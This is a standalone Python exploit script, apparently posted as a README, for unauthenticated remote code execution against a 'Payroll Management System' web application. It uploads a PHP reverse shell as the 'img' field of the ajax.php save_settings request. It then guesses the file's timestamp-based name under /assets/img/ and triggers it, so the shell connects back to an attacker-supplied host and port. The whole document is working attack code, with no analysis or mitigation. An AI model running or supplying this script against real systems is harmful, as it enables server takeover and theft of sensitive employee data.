README.md
Rendering markdown...
#!/usr/bin/python
import argparse
import time
import requests
class Exploit:
def __init__(self, rhost, rport, lhost, lport, https):
self.rhost = rhost
self.rport = rport
self.lhost = lhost
self.lport = lport
self.targetUrl = f'https://{rhost}:{rport}' if https else f'http://{rhost}:{rport}'
self.banner()
def banner(self):
print("""
_____ _ _
| __ \ | | |
| |__) |_ _ _ _ _ __ ___ | | |
| ___/ _` | | | | '__/ _ \| | |
| | | (_| | |_| | | | (_) | | |
|_| _\__,_|\__, |_| \___/|_|_| _
| \/ | __/ | | |
| \ / | __ |___/_ __ _ __ _ ___ _ __ ___ ___ _ __ | |_
| |\/| |/ _` | '_ \ / _` |/ _` |/ _ \ '_ ` _ \ / _ \ '_ \| __|
| | | | (_| | | | | (_| | (_| | __/ | | | | | __/ | | | |_
|_|__|_|\__,_|_| |_|\__,_|\__, |\___|_|_|_| |_|\___|_|_|_|\__|
/ ____| | | __/ | | __ \ / ____| ____|
| (___ _ _ ___| |_ ___ |___/___ | |__) | | | |__
\___ \| | | / __| __/ _ \ '_ ` _ \ | _ /| | | __|
____) | |_| \__ \ || __/ | | | | | | | \ \| |____| |____
|_____/ \__, |___/\__\___|_| |_| |_| |_| \_\\_____|______|
__/ |
|___/
""")
def getData(self):
return {
'name': 'John Doe',
'email': '[email protected]',
'contact': 'John Doe',
'about': 'John Doe',
}
def getPayload(self):
with open('php_reverse_shell.php', 'r') as file:
rev_shell = file.read().replace('LHOST', self.lhost).replace('LPORT', self.lport)
return rev_shell
def uploadRevShell(self):
url = f'{self.targetUrl}/ajax.php?action=save_settings'
print(f'Uploading a reverse shell via {url}')
requests.post(url, files={'img': ('a.php', self.getPayload())},
data=self.getData())
epoch = time.time()
timestamp = epoch - (epoch % 60)
timestamp_minus_one_min = timestamp - 60
timestamp_plus_one_min = timestamp + 60
return [f'{int(timestamp)}_a.php', f'{int(timestamp_minus_one_min)}_a.php',
f'{int(timestamp_plus_one_min)}_a.php']
def openRevShell(self, candidates):
print('Opening a reverse shell')
for candidate in candidates:
url = f'{self.targetUrl}/assets/img/{candidate}'
try:
requests.get(url).raise_for_status()
print(f'Got a success response for {url}, you should have a revshell')
return
except Exception as e:
print(f'Failed to open revshell using {url}')
print('Guessing filename failed')
def exploit(self):
candidates = self.uploadRevShell()
self.openRevShell(candidates)
def get_args():
parser = argparse.ArgumentParser(
description='Payroll Management System - Remote Code Execution (RCE) (Unauthenticated)')
parser.add_argument('-rhost', '--remote-host', dest="rhost", required=True, action='store', help='Remote host')
parser.add_argument('-rport', '--remote-port', dest="rport", required=False, action='store', help='Remote port',
default=80)
parser.add_argument('-lhost', '--local-host', dest="lhost", required=True, action='store', help='Local host')
parser.add_argument('-lport', '--local-port', dest="lport", required=True, action='store', help='Local port')
parser.add_argument('-https', '--https', dest="https", required=False, action='store_true', help='Use https')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = get_args()
exp = Exploit(args.rhost, args.rport, args.lhost, args.lport, args.https)
exp.exploit()